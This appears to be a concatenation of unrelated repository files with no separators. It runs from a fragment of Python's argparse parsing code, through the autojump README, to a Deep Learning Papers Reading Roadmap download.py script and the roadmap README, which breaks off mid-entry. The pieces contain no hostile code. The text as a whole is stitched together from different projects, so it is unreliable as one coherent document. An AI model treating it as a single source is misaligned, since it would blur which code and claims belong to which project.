same arg string # (e.g. -xyz is the same as -x -y -z if no args are required) match_argument = self._match_argument action_tuples = [] while True: # if we found no optional action, skip it if action is None: extras.append(arg_strings[start_index]) return start_index + 1 # if there is an explicit argument, try to match the # optional's string arguments to only this if explicit_arg is not None: arg_count = match_argument(action, 'A') # if the action is a single-dash option and takes no # arguments, try to parse more single-dash options out # of the tail of the option string chars = self.prefix_chars if arg_count == 0 and option_string[1] not in chars: action_tuples.append((action, [], option_string)) char = option_string[0] option_string = char + explicit_arg[0] new_explicit_arg = explicit_arg[1:] or None optionals_map = self._option_string_actions if option_string in optionals_map: action = optionals_map[option_string] explicit_arg = new_explicit_arg else: msg = _('ignored explicit argument %r') raise ArgumentError(action, msg % explicit_arg) # if the action expect exactly one argument, we've # successfully matched the option; exit the loop elif arg_count == 1: stop = start_index + 1 args = [explicit_arg] action_tuples.append((action, args, option_string)) break # error if a double-dash option did not use the # explicit argument else: msg = _('ignored explicit argument %r') raise ArgumentError(action, msg % explicit_arg) # if there is no explicit argument, try to match the # optional's string arguments with the following strings # if successful, exit the loop else: start = start_index + 1 selected_patterns = arg_strings_pattern[start:] arg_count = match_argument(action, selected_patterns) stop = start + arg_count args = arg_strings[start:stop] action_tuples.append((action, args, option_string)) break # add the Optional to the list and return the index at which # the Optional's string args stopped assert action_tuples for action, args, option_string in action_tuples: take_action(action, args, option_string) return stop # the list of Positionals left to be parsed; this is modified # by consume_positionals() positionals = self._get_positional_actions() # function to convert arg_strings into positional actions def consume_positionals(start_index): # match as many Positionals as possible match_partial = self._match_arguments_partial selected_pattern = arg_strings_pattern[start_index:] arg_counts = match_partial(positionals, selected_pattern) # slice off the appropriate arg strings for each Positional # and add the Positional and its args to the list for action, arg_count in zip(positionals, arg_counts): args = arg_strings[start_index: start_index + arg_count] start_index += arg_count take_action(action, args) # slice off the Positionals that we just parsed and return the # index at which the Positionals' string args stopped positionals[:] = positionals[len(arg_counts):] return start_index # consume Positionals and Optionals alternately, until we have # passed the last option string extras = [] start_index = 0 if option_string_indices: max_option_string_index = max(option_string_indices) else: max_option_string_index = -1 while start_index <= max_option_string_index: # consume any Positionals preceding the next option next_option_string_index = min([ index for index in option_string_indices if index >= start_index ]) if start_index != next_option_string_index: positionals_end_index = consume_positionals(start_index) # only try to parse the next optional if we didn't consume # the option string during the positionals parsing if positionals_end_index > start_index: start_index = positionals_end_index continue else: start_index = positionals_end_index # if we consumed all the positionals we could and we're not # at the index of an option string, there were extra arguments if start_index not in option_string_indices: strings = arg_strings[start_index:next_option_string_index] extras.extend(strings) start_index = next_option_string_index # consume the next optional and any arguments for it start_index = consume_optional(start_index) # consume any positionals following the last Optional stop_index = consume_positionals(start_index) # if we didn't consume all the argument strings, there were extras extras.extend(arg_strings[stop_index:]) # if we didn't use all the Positional objects, there were too few # arg strings supplied. if positionals: self.error(_('too few arguments')) # make sure all required actions were present for action in self._actions: if action.required: if action not in seen_actions: name = _get_action_name(action) self.error(_('argument %s is required') % name) # make sure all required groups had one option present for group in self._mutually_exclusive_groups: if group.required: for action in group._group_actions: if action in seen_non_default_actions: break # if no actions were used, report the error else: names = [ _get_action_name(action) for action in group._group_actions if action.help is not SUPPRESS ] msg = _('one of the arguments %s is required') self.error(msg % ' '.join(names)) # return the updated namespace and the extra arguments return namespace, extras def _read_args_from_files(self, arg_strings): # expand arguments referencing files new_arg_strings = [] for arg_string in arg_strings: # for regular arguments, just add them back into the list if arg_string[0] not in self.fromfile_prefix_chars: new_arg_strings.append(arg_string) # replace arguments referencing files with the file content else: try: args_file = open(arg_string[1:]) try: arg_strings = [] for arg_line in args_file.read().splitlines(): for arg in self.convert_arg_line_to_args(arg_line): arg_strings.append(arg) arg_strings = self._read_args_from_files(arg_strings) new_arg_strings.extend(arg_strings) finally: args_file.close() except IOError: err = _sys.exc_info()[1] self.error(str(err)) # return the modified argument list return new_arg_strings def convert_arg_line_to_args(self, arg_line): return [arg_line] def _match_argument(self, action, arg_strings_pattern): # match the pattern for this action to the arg strings nargs_pattern = self._get_nargs_pattern(action) match = _re.match(nargs_pattern, arg_strings_pattern) # raise an exception if we weren't able to find a match if match is None: nargs_errors = { None: _('expected one argument'), OPTIONAL: _('expected at most one argument'), ONE_OR_MORE: _('expected at least one argument'), } default = _('expected %s argument(s)') % action.nargs msg = nargs_errors.get(action.nargs, default) raise ArgumentError(action, msg) # return the number of arguments matched return len(match.group(1)) def _match_arguments_partial(self, actions, arg_strings_pattern): # progressively shorten the actions list by slicing off the # final actions until we find a match result = [] for i in range(len(actions), 0, -1): actions_slice = actions[:i] pattern = ''.join([ self._get_nargs_pattern(action) for action in actions_slice ]) match = _re.match(pattern, arg_strings_pattern) if match is not None: result.extend([len(string) for string in match.groups()]) break # return the list of arg string counts return result def _parse_optional(self, arg_string): # if it's an empty string, it was meant to be a positional if not arg_string: return None # if it doesn't start with a prefix, it was meant to be positional if not arg_string[0] in self.prefix_chars: return None # if the option string is present in the parser, return the action if arg_string in self._option_string_actions: action = self._option_string_actions[arg_string] return action, arg_string, None # if it's just a single character, it was meant to be positional if len(arg_string) == 1: return None # if the option string before the "=" is present, return the action if '=' in arg_string: option_string, explicit_arg = arg_string.split('=', 1) if option_string in self._option_string_actions: action = self._option_string_actions[option_string] return action, option_string, explicit_arg # search through all possible prefixes of the option string # and all actions in the parser for possible interpretations option_tuples = self._get_option_tuples(arg_string) # if multiple actions match, the option string was ambiguous if len(option_tuples) > 1: options = ', '.join( [option_string for action, option_string, explicit_arg in option_tuples], ) tup = arg_string, options self.error(_('ambiguous option: %s could match %s') % tup) # if exactly one action matched, this segmentation is good, # so return the parsed action elif len(option_tuples) == 1: option_tuple, = option_tuples return option_tuple # if it was not found as an option, but it looks like a negative # number, it was meant to be positional # unless there are negative-number-like options if self._negative_number_matcher.match(arg_string): if not self._has_negative_number_optionals: return None # if it contains a space, it was meant to be a positional if ' ' in arg_string: return None # it was meant to be an optional but there is no such option # in this parser (though it might be a valid option in a subparser) return None, arg_string, None def _get_option_tuples(self, option_string): result = [] # option strings starting with two prefix characters are only # split at the '=' chars = self.prefix_chars if option_string[0] in chars and option_string[1] in chars: if '=' in option_string: option_prefix, explicit_arg = option_string.split('=', 1) else: option_prefix = option_string explicit_arg = None for option_string in self._option_string_actions: if option_string.startswith(option_prefix): action = self._option_string_actions[option_string] tup = action, option_string, explicit_arg result.append(tup) # single character options can be concatenated with their arguments # but multiple character options always have to have their argument # separate elif option_string[0] in chars and option_string[1] not in chars: option_prefix = option_string explicit_arg = None short_option_prefix = option_string[:2] short_explicit_arg = option_string[2:] for option_string in self._option_string_actions: if option_string == short_option_prefix: action = self._option_string_actions[option_string] tup = action, option_string, short_explicit_arg result.append(tup) elif option_string.startswith(option_prefix): action = self._option_string_actions[option_string] tup = action, option_string, explicit_arg result.append(tup) # shouldn't ever get here else: self.error(_('unexpected option string: %s') % option_string) # return the collected option tuples return result def _get_nargs_pattern(self, action): # in all examples below, we have to allow for '--' args # which are represented as '-' in the pattern nargs = action.nargs # the default (None) is assumed to be a single argument if nargs is None: nargs_pattern = '(-*A-*)' # allow zero or one arguments elif nargs == OPTIONAL: nargs_pattern = '(-*A?-*)' # allow zero or more arguments elif nargs == ZERO_OR_MORE: nargs_pattern = '(-*[A-]*)' # allow one or more arguments elif nargs == ONE_OR_MORE: nargs_pattern = '(-*A[A-]*)' # allow any number of options or arguments elif nargs == REMAINDER: nargs_pattern = '([-AO]*)' # allow one argument followed by any number of options or arguments elif nargs == PARSER: nargs_pattern = '(-*A[-AO]*)' # all others should be integers else: nargs_pattern = '(-*%s-*)' % '-*'.join('A' * nargs) # if this is an optional action, -- is not allowed if action.option_strings: nargs_pattern = nargs_pattern.replace('-*', '') nargs_pattern = nargs_pattern.replace('-', '') # return the pattern return nargs_pattern # ======================== # Value conversion methods # ======================== def _get_values(self, action, arg_strings): # for everything but PARSER args, strip out '--' if action.nargs not in [PARSER, REMAINDER]: arg_strings = [s for s in arg_strings if s != '--'] # optional argument produces a default when not present if not arg_strings and action.nargs == OPTIONAL: if action.option_strings: value = action.const else: value = action.default if isinstance(value, basestring): value = self._get_value(action, value) self._check_value(action, value) # when nargs='*' on a positional, if there were no command-line # args, use the default if it is anything other than None elif ( not arg_strings and action.nargs == ZERO_OR_MORE and not action.option_strings ): if action.default is not None: value = action.default else: value = arg_strings self._check_value(action, value) # single argument or optional argument produces a single value elif len(arg_strings) == 1 and action.nargs in [None, OPTIONAL]: arg_string, = arg_strings value = self._get_value(action, arg_string) self._check_value(action, value) # REMAINDER arguments convert all values, checking none elif action.nargs == REMAINDER: value = [self._get_value(action, v) for v in arg_strings] # PARSER arguments convert all values, but check only the first elif action.nargs == PARSER: value = [self._get_value(action, v) for v in arg_strings] self._check_value(action, value[0]) # all other types of nargs produce a list else: value = [self._get_value(action, v) for v in arg_strings] for v in value: self._check_value(action, v) # return the converted value return value def _get_value(self, action, arg_string): type_func = self._registry_get('type', action.type, action.type) if not _callable(type_func): msg = _('%r is not callable') raise ArgumentError(action, msg % type_func) # convert the value to the appropriate type try: result = type_func(arg_string) # ArgumentTypeErrors indicate errors except ArgumentTypeError: name = getattr(action.type, '__name__', repr(action.type)) msg = str(_sys.exc_info()[1]) raise ArgumentError(action, msg) # TypeErrors or ValueErrors also indicate errors except (TypeError, ValueError): name = getattr(action.type, '__name__', repr(action.type)) msg = _('invalid %s value: %r') raise ArgumentError(action, msg % (name, arg_string)) # return the converted value return result def _check_value(self, action, value): # converted value must be one of the choices (if specified) if action.choices is not None and value not in action.choices: tup = value, ', '.join(map(repr, action.choices)) msg = _('invalid choice: %r (choose from %s)') % tup raise ArgumentError(action, msg) # ======================= # Help-formatting methods # ======================= def format_usage(self): formatter = self._get_formatter() formatter.add_usage( self.usage, self._actions, self._mutually_exclusive_groups, ) return formatter.format_help() def format_help(self): formatter = self._get_formatter() # usage formatter.add_usage( self.usage, self._actions, self._mutually_exclusive_groups, ) # description formatter.add_text(self.description) # positionals, optionals and user-defined groups for action_group in self._action_groups: formatter.start_section(action_group.title) formatter.add_text(action_group.description) formatter.add_arguments(action_group._group_actions) formatter.end_section() # epilog formatter.add_text(self.epilog) # determine help from format above return formatter.format_help() def format_version(self): import warnings warnings.warn( 'The format_version method is deprecated -- the "version" ' 'argument to ArgumentParser is no longer supported.', DeprecationWarning, ) formatter = self._get_formatter() formatter.add_text(self.version) return formatter.format_help() def _get_formatter(self): return self.formatter_class(prog=self.prog) # ===================== # Help-printing methods # ===================== def print_usage(self, file=None): if file is None: file = _sys.stdout self._print_message(self.format_usage(), file) def print_help(self, file=None): if file is None: file = _sys.stdout self._print_message(self.format_help(), file) def print_version(self, file=None): import warnings warnings.warn( 'The print_version method is deprecated -- the "version" ' 'argument to ArgumentParser is no longer supported.', DeprecationWarning, ) self._print_message(self.format_version(), file) def _print_message(self, message, file=None): if message: if file is None: file = _sys.stderr file.write(message) # =============== # Exiting methods # =============== def exit(self, status=0, message=None): if message: self._print_message(message, _sys.stderr) _sys.exit(status) def error(self, message): """error(message: string) Prints a usage message incorporating the message to stderr and exits. If you override this in a subclass, it should not return -- it should either exit or raise an exception. """ self.print_usage(_sys.stderr) self.exit(2, _('%s: error: %s\n') % (self.prog, message))
NAME ---- autojump - a faster way to navigate your filesystem DESCRIPTION ----------- autojump is a faster way to navigate your filesystem. It works by maintaining a database of the directories you use the most from the command line. *Directories must be visited first before they can be jumped to.* USAGE ----- `j` is a convenience wrapper function around `autojump`. Any option that can be used with `autojump` can be used with `j` and vice versa. - Jump To A Directory That Contains `foo`: j foo - Jump To A Child Directory: Sometimes it's convenient to jump to a child directory (sub-directory of current directory) rather than typing out the full name. jc bar - Open File Manager To Directories (instead of jumping): Instead of jumping to a directory, you can open a file explorer window (Mac Finder, Windows Explorer, GNOME Nautilus, etc.) to the directory instead. jo music Opening a file manager to a child directory is also supported: jco images - Using Multiple Arguments: Let's assume the following database: 30 /home/user/mail/inbox 10 /home/user/work/inbox `j in` would jump into /home/user/mail/inbox as the higher weighted entry. However you can pass multiple arguments to autojump to prefer a different entry. In the above example, `j w in` would then change directory to /home/user/work/inbox. For more options refer to help: autojump --help INSTALLATION ------------ ### REQUIREMENTS - Python v2.6+ or Python v3.3+ - Supported shells - bash - first class support - zsh - first class support - fish - community supported - tcsh - community supported - clink - community supported - Supported platforms - Linux - first class support - OS X - first class support - Windows - community supported - BSD - community supported - Supported installation methods - source code - first class support - Debian and derivatives - first class support - ArchLinux / Gentoo / openSUSE / RedHat and derivatives - community supported - Homebrew / MacPorts - community supported Due to limited time and resources, only "first class support" items will be maintained by the primary committers. All "community supported" items will be updated based on pull requests submitted by the general public. Please continue opening issues and providing feedback for community supported items since consolidating information helps other users troubleshoot and submit enhancements and fixes. ### MANUAL Grab a copy of autojump: git clone git://github.com/wting/autojump.git Run the installation script and follow on screen instructions. cd autojump ./install.py or ./uninstall.py ### AUTOMATIC #### Linux autojump is included in the following distro repositories, please use relevant package management utilities to install (e.g. apt-get, yum, pacman, etc): - Debian, Ubuntu, Linux Mint All Debian-derived distros require manual activation for policy reasons, please see `/usr/share/doc/autojump/README.Debian`. - RedHat, Fedora, CentOS Install `autojump-zsh` for zsh, `autojump-fish` for fish, etc. - ArchLinux - Gentoo - Frugalware - Slackware #### OS X Homebrew is the recommended installation method for Mac OS X: brew install autojump MacPorts is also available: port install autojump Windows ------- Windows support is enabled by [clink](https://mridgers.github.io/clink/) which should be installed prior to installing autojump. KNOWN ISSUES ------------ - autojump does not support directories that begin with `-`. - For bash users, autojump keeps track of directories by modifying `$PROMPT_COMMAND`. Do not overwrite `$PROMPT_COMMAND`: export PROMPT_COMMAND="history -a" Instead append to the end of the existing \$PROMPT\_COMMAND: export PROMPT_COMMAND="${PROMPT_COMMAND:+$PROMPT_COMMAND ;} history -a" REPORTING BUGS -------------- For any questions or issues please visit: https://github.com/wting/autojump/issues AUTHORS ------- autojump was originally written by Joël Schaerer, and currently maintained by William Ting. More contributors can be found in `AUTHORS`. COPYRIGHT --------- Copyright © 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.
Deep-Learning-Papers-Reading-Roadmap
a994642f82f071926fcb472bcf6cd63e4abba7ab
File: download.py from __future__ import print_function import os import re from six.moves.urllib.error import HTTPError import shutil import argparse import mistune import bs4 as BeautifulSoup import socket import time import requests # encoding=utf8 import sys try: reload(sys) except NameError: pass try: sys.setdefaultencoding('utf8') except AttributeError: pass def download_pdf(link, location, name): try: response = requests.get(link) with open(os.path.join(location, name), 'wb') as f: f.write(response.content) f.close() except HTTPError: print('>>> Error 404: cannot be downloaded!\n') raise except socket.timeout: print(" ".join(("can't download", link, "due to connection timeout!")) ) raise def clean_pdf_link(link): if 'arxiv' in link: link = link.replace('abs', 'pdf') if not(link.endswith('.pdf')): link = '.'.join((link, 'pdf')) print(link) return link def clean_text(text, replacements = {':': '_', ' ': '_', '/': '_', '.': '', '"': ''}): for key, rep in replacements.items(): text = text.replace(key, rep) return text def print_title(title, pattern = "-"): print('\n'.join(("", title, pattern * len(title)))) def get_extension(link): extension = os.path.splitext(link)[1][1:] if extension in ['pdf', 'html']: return extension if 'pdf' in extension: return 'pdf' return 'pdf' def shorten_title(title): m1 = re.search('[[0-9]*]', title) m2 = re.search('".*"', title) if m1: title = m1.group(0) if m2: title = ' '.join((title, m2.group(0))) return title[:50] + ' [...]' if __name__ == '__main__': parser = argparse.ArgumentParser(description = 'Download all the PDF/HTML links into README.md') parser.add_argument('-d', action="store", dest="directory") parser.add_argument('--no-html', action="store_true", dest="nohtml", default = False) parser.add_argument('--overwrite', action="store_true", default = False) results = parser.parse_args() output_directory = 'pdfs' if results.directory is None else results.directory forbidden_extensions = ['html', 'htm'] if results.nohtml else [] if results.overwrite and os.path.exists(output_directory): shutil.rmtree(output_directory) with open('README.md',encoding='utf8') as readme: readme_html = mistune.markdown(readme.read()) readme_soup = BeautifulSoup.BeautifulSoup(readme_html, "html.parser") point = readme_soup.find_all('h1')[1] failures = [] while point is not None: if point.name: if re.search('h[1-2]', point.name): if point.name == 'h1': h1_directory = os.path.join(output_directory, clean_text(point.text)) current_directory = h1_directory elif point.name == 'h2': current_directory = os.path.join(h1_directory, clean_text(point.text)) if not os.path.exists(current_directory): os.makedirs(current_directory) print_title(point.text) if point.name == 'p': link = point.find('a') if link is not None: link = clean_pdf_link(link.attrs['href']) ext = get_extension(link) print(ext) if not ext in forbidden_extensions: print(shorten_title(point.text) + ' (' + link + ')') try: name = clean_text(point.text.split('[' + ext + ']')[0]) fullname = '.'.join((name, ext)) if not os.path.exists('/'.join((current_directory, fullname)) ): download_pdf(link, current_directory, '.'.join((name, ext))) except KeyboardInterrupt: try: print("Press Ctrl-C in 1 second to quit") time.sleep(1) except KeyboardInterrupt: print("Cancelling..") break except: failures.append(point.text) point = point.next_sibling print('Done!') if failures: print('Some downloads have failed:') for fail in failures: print('> ' + fail)
# Deep Learning Papers Reading Roadmap >If you are a newcomer to the Deep Learning area, the first question you may have is "Which paper should I start reading from?" >Here is a reading roadmap of Deep Learning papers! The roadmap is constructed in accordance with the following four guidelines: - From outline to detail - From old to state-of-the-art - from generic to specific areas - focus on state-of-the-art You will find many papers that are quite new but really worth reading. I would continue adding papers to this roadmap. --------------------------------------- # 1 Deep Learning History and Basics ## 1.0 Book **[0]** Bengio, Yoshua, Ian J. Goodfellow, and Aaron Courville. "**Deep learning**." An MIT Press book. (2015). [[html]](http://www.deeplearningbook.org/) **(Deep Learning Bible, you can read this book while reading following papers.)** :star::star::star::star::star: ## 1.1 Survey **[1]** LeCun, Yann, Yoshua Bengio, and Geoffrey Hinton. "**Deep learning**." Nature 521.7553 (2015): 436-444. [[pdf]](http://www.cs.toronto.edu/~hinton/absps/NatureDeepReview.pdf) **(Three Giants' Survey)** :star::star::star::star::star: ## 1.2 Deep Belief Network(DBN)(Milestone of Deep Learning Eve) **[2]** Hinton, Geoffrey E., Simon Osindero, and Yee-Whye Teh. "**A fast learning algorithm for deep belief nets**." Neural computation 18.7 (2006): 1527-1554. [[pdf]](http://www.cs.toronto.edu/~hinton/absps/ncfast.pdf)**(Deep Learning Eve)** :star::star::star: **[3]** Hinton, Geoffrey E., and Ruslan R. Salakhutdinov. "**Reducing the dimensionality of data with neural networks**." Science 313.5786 (2006): 504-507. [[pdf]](http://www.cs.toronto.edu/~hinton/science.pdf) **(Milestone, Show the promise of deep learning)** :star::star::star: ## 1.3 ImageNet Evolution(Deep Learning broke out from here) **[4]** Krizhevsky, Alex, Ilya Sutskever, and Geoffrey E. Hinton. "**Imagenet classification with deep convolutional neural networks**." Advances in neural information processing systems. 2012. [[pdf]](http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks.pdf) **(AlexNet, Deep Learning Breakthrough)** :star::star::star::star::star: **[5]** Simonyan, Karen, and Andrew Zisserman. "**Very deep convolutional networks for large-scale image recognition**." arXiv preprint arXiv:1409.1556 (2014). [[pdf]](https://arxiv.org/pdf/1409.1556.pdf) **(VGGNet,Neural Networks become very deep!)** :star::star::star: **[6]** Szegedy, Christian, et al. "**Going deeper with convolutions**." Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2015. [[pdf]](http://www.cv-foundation.org/openaccess/content_cvpr_2015/papers/Szegedy_Going_Deeper_With_2015_CVPR_paper.pdf) **(GoogLeNet)** :star::star::star: **[7]** He, Kaiming, et al. "**Deep residual learning for image recognition**." arXiv preprint arXiv:1512.03385 (2015). [[pdf]](https://arxiv.org/pdf/1512.03385.pdf) **(ResNet,Very very deep networks, CVPR best paper)** :star::star::star::star::star: ## 1.4 Speech Recognition Evolution **[8]** Hinton, Geoffrey, et al. "**Deep neural networks for acoustic modeling in speech recognition: The shared views of four research groups**." IEEE Signal Processing Magazine 29.6 (2012): 82-97. [[pdf]](http://cs224d.stanford.edu/papers/maas_paper.pdf) **(Breakthrough in speech recognition)**:star::star::star::star: **[9]** Graves, Alex, Abdel-rahman Mohamed, and Geoffrey Hinton. "**Speech recognition with deep recurrent neural networks**." 2013 IEEE international conference on acoustics, speech and signal processing. IEEE, 2013. [[pdf]](http://arxiv.org/pdf/1303.5778.pdf) **(RNN)**:star::star::star: **[10]** Graves, Alex, and Navdeep Jaitly. "**Towards End-To-End Speech Recognition with Recurrent Neural Networks**." ICML. Vol. 14. 2014. [[pdf]](http://www.jmlr.org/proceedings/papers/v32/graves14.pdf):star::star::star: **[11]** Sak, Haşim, et al. "**Fast and accurate recurrent neural network acoustic models for speech recognition**." arXiv preprint arXiv:1507.06947 (2015). [[pdf]](http://arxiv.org/pdf/1507.06947) **(Google Speech Recognition System)** :star::star::star: **[12]** Amodei, Dario, et al. "**Deep speech 2: End-to-end speech recognition in english and mandarin**." arXiv preprint arXiv:1512.02595 (2015). [[pdf]](https://arxiv.org/pdf/1512.02595.pdf) **(Baidu Speech Recognition System)** :star::star::star::star: **[13]** W. Xiong, J. Droppo, X. Huang, F. Seide, M. Seltzer, A. Stolcke, D. Yu, G. Zweig "**Achieving Human Parity in Conversational Speech Recognition**." arXiv preprint arXiv:1610.05256 (2016). [[pdf]](https://arxiv.org/pdf/1610.05256v1) **(State-of-the-art in speech recognition, Microsoft)** :star::star::star::star: >After reading above papers, you will have a basic understanding of the Deep Learning history, the basic architectures of Deep Learning model(including CNN, RNN, LSTM) and how deep learning can be applied to image and speech recognition issues. The following papers will take you in-depth understanding of the Deep Learning method, Deep Learning in different areas of application and the frontiers. I suggest that you can choose the following papers based on your interests and research direction. #2 Deep Learning Method ## 2.1 Model **[14]** Hinton, Geoffrey E., et al. "**Improving neural networks by preventing co-adaptation of feature detectors**." arXiv preprint arXiv:1207.0580 (2012). [[pdf]](https://arxiv.org/pdf/1207.0580.pdf) **(Dropout)** :star::star::star: **[15]** Srivastava, Nitish, et al. "**Dropout: a simple way to prevent neural networks from overfitting**." Journal of Machine Learning Research 15.1 (2014): 1929-1958. [[pdf]](https://www.cs.toronto.edu/~hinton/absps/JMLRdropout.pdf) :star::star::star: **[16]** Ioffe, Sergey, and Christian Szegedy. "**Batch normalization: Accelerating deep network training by reducing internal covariate shift**." arXiv preprint arXiv:1502.03167 (2015). [[pdf]](http://arxiv.org/pdf/1502.03167) **(An outstanding Work in 2015)** :star::star::star::star: **[17]** Ba, Jimmy Lei, Jamie Ryan Kiros, and Geoffrey E. Hinton. "**Layer normalization**." arXiv preprint arXiv:1607.06450 (2016). [[pdf]](https://arxiv.org/pdf/1607.06450.pdf?utm_source=sciontist.com&utm_medium=refer&utm_campaign=promote) **(Update of Batch Normalization)** :star::star::star::star: **[18]** Courbariaux, Matthieu, et al. "**Binarized Neural Networks: Training Neural Networks with Weights and Activations Constrained to+ 1 or−1**." [[pdf]](https://pdfs.semanticscholar.org/f832/b16cb367802609d91d400085eb87d630212a.pdf) **(New Model,Fast)** :star::star::star: **[19]** Jaderberg, Max, et al. "**Decoupled neural interfaces using synthetic gradients**." arXiv preprint arXiv:1608.05343 (2016). [[pdf]](https://arxiv.org/pdf/1608.05343) **(Innovation of Training Method,Amazing Work)** :star::star::star::star::star: **[20]** Chen, Tianqi, Ian Goodfellow, and Jonathon Shlens. "Net2net: Accelerating learning via knowledge transfer." arXiv preprint arXiv:1511.05641 (2015). [[pdf]](https://arxiv.org/abs/1511.05641) **(Modify previously trained network to reduce training epochs)** :star::star::star: **[21]** Wei, Tao, et al. "Network Morphism." arXiv preprint arXiv:1603.01670 (2016). [[pdf]](https://arxiv.org/abs/1603.01670) **(Modify previously trained network to reduce training epochs)** :star::star::star: ## 2.2 Optimization **[22]** Sutskever, Ilya, et al. "**On the importance of initialization and momentum in deep learning**." ICML (3) 28 (2013): 1139-1147. [[pdf]](http://www.jmlr.org/proceedings/papers/v28/sutskever13.pdf) **(Momentum optimizer)** :star::star: **[23]** Kingma, Diederik, and Jimmy Ba. "**Adam: A method for stochastic optimization**." arXiv preprint arXiv:1412.6980 (2014). [[pdf]](http://arxiv.org/pdf/1412.6980) **(Maybe used most often currently)** :star::star::star: **[24]** Andrychowicz, Marcin, et al. "**Learning to learn by gradient descent by gradient descent**." arXiv preprint arXiv:1606.04474 (2016). [[pdf]](https://arxiv.org/pdf/1606.04474) **(Neural Optimizer,Amazing Work)** :star::star::star::star::star: **[25]** Han, Song, Huizi Mao, and William J. Dally. "**Deep compression: Compressing deep neural network with pruning, trained quantization and huffman coding**." CoRR, abs/1510.00149 2 (2015). [[pdf]](https://pdfs.semanticscholar.org/5b6c/9dda1d88095fa4aac1507348e498a1f2e863.pdf) **(ICLR best paper, new direction to make NN running fast,DeePhi Tech Startup)** :star::star::star::star::star: **[26]** Iandola, Forrest N., et al. "**SqueezeNet: AlexNet-level accuracy with 50x fewer parameters and< 1MB model size**." arXiv preprint arXiv:1602.07360 (2016). [[pdf]](http://arxiv.org/pdf/1602.07360) **(Also a new direction to optimize NN,DeePhi Tech Startup)** :star::star::star::star: **[27]** Glorat Xavier, Bengio Yoshua, et al. "**Understanding the difficulty of training deep forward neural networks**." Proceedings of the thirteenth International Conference on Artificial Intelligence and Statistics, PMLR 9:249-256,2010. [[pdf]](http://proceedings.mlr.press/v9/glorot10a/glorot10a.pdf) :star::star::star::star: ## 2.3 Unsupervised Learning / Deep Generative Model **[28]** Le, Quoc V. "**Building high-level features using large scale unsupervised learning**." 2013 IEEE international conference on acoustics, speech and signal processing. IEEE, 2013. [[pdf]](http://arxiv.org/pdf/1112.6209.pdf&embed) **(Milestone, Andrew Ng, Google Brain Project, Cat)** :star::star::star::star: **[29]** Kingma, Diederik P., and Max Welling. "**Auto-encoding variational bayes**." arXiv preprint arXiv:1312.6114 (2013). [[pdf]](http://arxiv.org/pdf/1312.6114) **(VAE)** :star::star::star::star: **[30]** Goodfellow, Ian, et al. "**Generative adversarial nets**." Advances in Neural Information Processing Systems. 2014. [[pdf]](http://papers.nips.cc/paper/5423-generative-adversarial-nets.pdf) **(GAN,super cool idea)** :star::star::star::star::star: **[31]** Radford, Alec, Luke Metz, and Soumith Chintala. "**Unsupervised representation learning with deep convolutional generative adversarial networks**." arXiv preprint arXiv:1511.06434 (2015). [[pdf]](http://arxiv.org/pdf/1511.06434) **(DCGAN)** :star::star::star::star: **[32]** Gregor, Karol, et al. "**DRAW: A recurrent neural network for image generation**." arXiv preprint arXiv:1502.04623 (2015). [[pdf]](http://jmlr.org/proceedings/papers/v37/gregor15.pdf) **(VAE with attention, outstanding work)** :star::star::star::star::star: **[33]** Oord, Aaron van den, Nal Kalchbrenner, and Koray Kavukcuoglu. "**Pixel recurrent neural networks**." arXiv preprint arXiv:1601.06759 (2016). [[pdf]](http://arxiv.org/pdf/1601.06759) **(PixelRNN)** :star::star::star::star: **[34]** Oord, Aaron van den, et al. "Conditional image generation with PixelCNN decoders." arXiv preprint arXiv:1606.05328 (2016). [[pdf]](https://arxiv.org/pdf/1606.05328) **(PixelCNN)** :star::star::star::star: **[34]** S. Mehri et al., "**SampleRNN: An Unconditional End-to-End Neural Audio Generation Model**." arXiv preprint arXiv:1612.07837 (2016). [[pdf]](https://arxiv.org/pdf/1612.07837.pdf) :star::star::star::star::star: ## 2.4 RNN / Sequence-to-Sequence Model **[35]** Graves, Alex. "**Generating sequences with recurrent neural networks**." arXiv preprint arXiv:1308.0850 (2013). [[pdf]](http://arxiv.org/pdf/1308.0850) **(LSTM, very nice generating result, show the power of RNN)** :star::star::star::star: **[36]** Cho, Kyunghyun, et al. "**Learning phrase representations using RNN encoder-decoder for statistical machine translation**." arXiv preprint arXiv:1406.1078 (2014). [[pdf]](http://arxiv.org/pdf/1406.1078) **(First Seq-to-Seq Paper)** :star::star::star::star: **[37]** Sutskever, Ilya, Oriol Vinyals, and Quoc V. Le. "**Sequence to sequence learning with neural networks**." Advances in neural information processing systems. 2014. [[pdf]](https://arxiv.org/pdf/1409.3215.pdf) **(Outstanding Work)** :star::star::star::star::star: **[38]** Bahdanau, Dzmitry, KyungHyun Cho, and Yoshua Bengio. "**Neural Machine Translation by Jointly Learning to Align and Translate**." arXiv preprint arXiv:1409.0473 (2014). [[pdf]](https://arxiv.org/pdf/1409.0473v7.pdf) :star::star::star::star: **[39]** Vinyals, Oriol, and Quoc Le. "**A neural conversational model**." arXiv preprint arXiv:1506.05869 (2015). [[pdf]](http://arxiv.org/pdf/1506.05869.pdf%20(http://arxiv.org/pdf/1506.05869.pdf)) **(Seq-to-Seq on Chatbot)** :star::star::star: ## 2.5 Neural Turing Machine **[40]** Graves, Alex, Greg Wayne, and Ivo Danihelka. "**Neural turing machines**." arXiv preprint arXiv:1410.5401 (2014). [[pdf]](http://arxiv.org/pdf/1410.5401.pdf) **(Basic Prototype of Future Computer)** :star::star::star::star::star: **[41]** Zaremba, Wojciech, and Ilya Sutskever. "**Reinforcement learning neural Turing machines**." arXiv preprint arXiv:1505.00521 362 (2015). [[pdf]](https://pdfs.semanticscholar.org/f10e/071292d593fef939e6ef4a59baf0bb3a6c2b.pdf) :star::star::star: **[42]** Weston, Jason, Sumit Chopra, and Antoine Bordes. "**Memory networks**." arXiv preprint arXiv:1410.3916 (2014). [[pdf]](http://arxiv.org/pdf/1410.3916) :star::star::star: **[43]** Sukhbaatar, Sainbayar, Jason Weston, and Rob Fergus. "**End-to-end memory networks**." Advances in neural information processing systems. 2015. [[pdf]](http://papers.nips.cc/paper/5846-end-to-end-memory-networks.pdf) :star::star::star::star: **[44]** Vinyals, Oriol, Meire Fortunato, and Navdeep Jaitly. "**Pointer networks**." Advances in Neural Information Processing Systems. 2015. [[pdf]](http://papers.nips.cc/paper/5866-pointer-networks.pdf) :star::star::star::star: **[45]** Graves, Alex, et al. "**Hybrid 